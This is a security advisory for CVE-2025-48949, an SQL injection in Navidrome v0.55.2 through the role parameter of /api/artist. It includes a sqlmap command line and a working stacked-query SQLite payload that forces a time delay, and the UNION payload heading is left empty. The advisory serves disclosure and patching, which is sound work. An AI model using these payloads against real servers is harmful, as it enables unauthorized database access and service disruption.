CVE-2025-48949: Navidrome allows SQL Injection via role parameter

(updated )

🛡 <strong>Security Advisory: SQL Injection Vulnerability in Navidrome v0.55.2</strong>

<strong>Overview</strong>

This vulnerability arises due to improper input validation on the role parameter within the API endpoint /api/artist. Attackers can exploit this flaw to inject arbitrary SQL queries, potentially gaining unauthorized access to the backend database and compromising sensitive user information.

<strong>Details</strong>

  • Vulnerable Component: API endpoint → /api/artist Parameter → role

  • Vulnerability Type: SQL Injection (stacked queries, UNION queries)

  • Database Affected: SQLite (confirmed exploitation via SQLite-specific payloads)

  • Impact: Successful exploitation allows an unauthenticated attacker to:

    • Execute arbitrary SQL commands
    • Extract or manipulate sensitive data (e.g., user records, playlists)
    • Potentially escalate privileges or disrupt service availability

<strong>Proof of Concept (PoC)</strong>

Example Exploit Command:

sqlmap.py -r navi --level 5 --risk 3 -a --banner --batch --tamper charencode --dbms sqlite

Sample Payloads:

  • Stacked Queries:

    http://navidrome/api/artist?_end=15&_order=ASC&_sort=name&_start=0&role=albumartist');SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))--

  • UNION-Based Query:

References

Code Behaviors & Features

Detect and mitigate CVE-2025-48949 with GitLab Dependency Scanning

Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →